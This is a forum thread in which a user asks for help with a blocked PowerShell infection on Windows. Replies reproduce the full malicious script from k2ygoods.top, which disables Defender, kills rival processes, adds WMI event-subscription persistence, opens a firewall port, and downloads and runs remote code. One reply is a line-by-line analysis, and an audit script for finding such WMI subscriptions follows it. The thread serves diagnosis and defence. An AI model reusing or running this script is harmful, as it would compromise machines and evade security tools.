Windows got infected

mingtdlb · 2024-9-5 10:30:32 · 199 views
Could some expert take a look at this? I searched Google for k2ygoods and got lots of hits.
```log
防护项目:利用系统进程启动恶意程序
可疑文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe  IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/power.txt')
操作结果:已阻止
进程 ID:5580
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行:cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/power.txt')
操作进程校验和:7C3D7281E1151FE4127923F4B4C3CD36438E1A12
父进程 ID:1132
父进程:C:\Windows\System32\wbem\WmiPrvSE.exe
父进程命令行:C:\Windows\system32\wbem\wmiprvse.exe -Embedding
```

![Windows infected](https://cdn-fusion.imgimg.cc/i/2024/3f8adcf1cfbc8dc1.png)
15 replies
siweipancc Beginner 2024-9-5 20:19:01
Ugh, a pile of AI output.
liangdi Intermediate 2024-9-5 18:50:38
@gbadge v50 and I'll tell you
gbadge Beginner 2024-9-5 18:09:56
I visited it; when do I get the ransom note?
GOliberation Intermediate 2024-9-5 17:57:24
```powershell
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="C:\Windows\debug\m\winlogon.exe"
#netsh advfirewall set allprofiles state off

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f

# oldservice

gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\conhost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Runtime.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Runtime.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Superfetch.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Superfetch.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='ApplicationsFrameHost.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\ApplicationsFrameHost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='MsTask.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MsTask.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;icacls "C:\ProgramData\migrate.exe" /setowner SYSTEM;icacls "C:\ProgramData\migrate.exe" /inheritance:r /deny "SYSTEM:F";}}
gwmi -Class 'Win32_Process' -Filter "Name='MicrosoftPrt.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MicrosoftPrt.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Wmiic.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Wmiic.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='IntelConfigService.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\IntelConfigService.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='warp.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\warp.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='WmiPrvSER.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}

$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"

if ($pExsit -and  $sExsit) {

    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
}else{
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata2'" | Remove-WmiObject -Verbose
    Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='updata2'" | Remove-WmiObject -Verbose
    Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%updata%'" | Remove-WmiObject -Verbose

    $filterName = 'updata'
    $consumerName = 'updata2'
    $exePath = 'cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://k2ygoods.top/power.txt'')'
    $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimfshex";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
    $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;CommandLineTemplate=$exePath}
    Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

    sc.exe stop "Windows Updata"
    sc.exe delete "Windows Updata"
    sc.exe stop "Windows Management"
    sc.exe delete "Windows Management"

    netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp

    #Start-Process  -windowstyle hidden
    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}
```

If you force the domain k2ygoods.top to 127.0.0.1 in your HOSTS file, the virus naturally stops working!
FreeGuy Intermediate 2024-9-5 16:02:19
On a Windows host, never install software that needs administrator rights; if you absolutely must use software that elevates, buy a powerful machine and run it in a Sandbox!
mirtle Intermediate 2024-9-5 14:46:18
#8 #11 Stop posting AI analyses; it's a small script you can sum up in a sentence or two, and this is flooding the thread.
glaz Intermediate 2024-9-5 14:26:57
@dyllen A web trojan (drive-by). There were tons of them back in the IE days; they could hit you with several exploits at once and you got infected just by visiting.
iyiluo Intermediate 2024-9-5 14:26:41
A browser 0day? Are you using IE?
LaureatePoet Intermediate 2024-9-5 14:22:54
http://k2ygoods[.]top/power.txt

This PowerShell script exhibits strongly malicious behaviour: it disables Windows security features, deletes system processes, and attempts to download and execute malicious code from a remote server. Below is a detailed analysis of the script:

### 1. Generate a random string
```powershell
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
```
- This line generates a random string of length 6 to 12, made up of lowercase letters and digits.

### 2. Define the target path
```powershell
$dst="C:\Windows\debug\m\winlogon.exe"
```
- This variable defines a path pointing to the supposed location of `winlogon.exe`.

### 3. Disable the firewall
```powershell
#netsh advfirewall set allprofiles state off
```
- The commented-out line attempts to turn off all Windows firewall profiles. Although it is commented out, it shows the script's potential intent.

### 4. Disable Windows Defender
```powershell
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
```
- These commands disable Windows Defender's real-time monitoring and anti-spyware features, making the system more vulnerable to malware.

### 5. Terminate and delete certain processes
```powershell
gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'" | %{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
```
- Uses `Get-WmiObject` (gwmi) to obtain the running processes and filter for processes with specific names (such as `svchost.exe`). If these processes are not in the expected system paths (such as `system32` or `syswow64`), it terminates them and force-deletes their executables.
- This section is clearly trying to clean out potentially malicious processes, but it could also kill legitimate processes and thus break normal system functionality.

### 6. Check whether a specific process and service exist
```powershell
$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"
```
- These two lines check whether the `winlogon` process is running from the specified path and whether a service named `Windows Updata` is running.

### 7. Download and execute code from a remote server
```powershell
if ($pExsit -and  $sExsit) {
    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
} else {
    ...
    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}
```
- If the checks pass, the script downloads and executes the content of `http://k2ygoods.top/config.txt`; otherwise it removes certain WMI events and consumers and then downloads and executes code from `http://k2ygoods.top/download.txt`.

### 8. Remove and create WMI event filters and consumers
```powershell
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
...
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" ...
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" ...
```
- This part of the script removes certain WMI event filters and consumers, then creates new ones. The new WMI event setup triggers execution of the remotely downloaded malicious code under specific conditions (such as performance-counter events).

### 9. Stop and delete services
```powershell
sc.exe stop "Windows Updata"
sc.exe delete "Windows Updata"
sc.exe stop "Windows Management"
sc.exe delete "Windows Management"
```
- These commands attempt to stop and delete the services named `Windows Updata` and `Windows Management`. Such actions may affect the system's management functionality.

### 10. Open a firewall rule
```powershell
netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp
```
- By adding a firewall rule, the script allows remote access on TCP port 59857, which could provide attackers with a backdoor.

### Summary
This script is malicious: it intends to disable the system's security features, clean up and terminate some system processes, set up a persistence mechanism, and download and execute malicious code from a remote server. It poses a serious threat to system security; running it could lead to the system being fully taken over or used for further malicious activity.
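As an added example (written here, not by anyone in this thread): a Windows PowerShell audit script that lists the permanent WMI event subscriptions described in section 8 and flags CommandLineEventConsumers that download and run remote code, which is how the `updata`/`updata2` persistence above re-launches `powershell.exe` from `WmiPrvSE.exe`. It assumes an elevated Windows PowerShell 5.1 prompt on the suspect machine; `$badPattern` and the `$Remove` switch are my own additions.

```powershell
# Added audit script (not from this thread). Lists permanent WMI event
# subscriptions in root\subscription and flags CommandLineEventConsumers whose
# command line downloads and runs remote code, the persistence the sample sets
# up under the names 'updata' (filter) and 'updata2' (consumer).
# Assumes an elevated Windows PowerShell 5.1 prompt; $badPattern is my own list.
$ns         = 'root\subscription'
$badPattern = 'DownloadString|IEX|Invoke-Expression|FromBase64String|-enc'
$Remove     = $false   # set to $true to delete the flagged entries after review

$filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
$consumers = @(Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer)
$bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)

$findings = foreach ($b in $bindings) {
    # Get-WmiObject returns Filter/Consumer as reference strings such as
    # __EventFilter.Name="updata"; pull the Name out of each one.
    $fName = [regex]::Match($b.Filter,   'Name="([^"]+)"').Groups[1].Value
    $cName = [regex]::Match($b.Consumer, 'Name="([^"]+)"').Groups[1].Value
    $f = $filters   | Where-Object { $_.Name -eq $fName }
    $c = $consumers | Where-Object { $_.Name -eq $cName }   # $null for other consumer types
    [pscustomobject]@{
        Filter      = $fName
        Query       = $f.Query
        Consumer    = $cName
        CommandLine = $c.CommandLineTemplate
        Suspicious  = [bool]($c.CommandLineTemplate -match $badPattern)
    }
}

# Every binding is shown; the Suspicious column is what to triage first.
$findings | Format-Table Filter, Consumer, Suspicious, CommandLine -AutoSize -Wrap

if ($Remove) {
    foreach ($hit in ($findings | Where-Object { $_.Suspicious })) {
        # Binding first, then consumer and filter, so nothing fires in between.
        $bindings  | Where-Object { $_.Consumer -like ('*Name="' + $hit.Consumer + '"*') } | Remove-WmiObject
        $consumers | Where-Object { $_.Name -eq $hit.Consumer } | Remove-WmiObject
        $filters   | Where-Object { $_.Name -eq $hit.Filter }   | Remove-WmiObject
    }
}
```

Record the `CommandLine` column before removing anything: it shows the exact URL the host was fetching from, which is what you block at DNS or in HOSTS as suggested earlier in the thread.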
suxiaoxiann Intermediate 2024-9-5 14:13:09
Can't access it.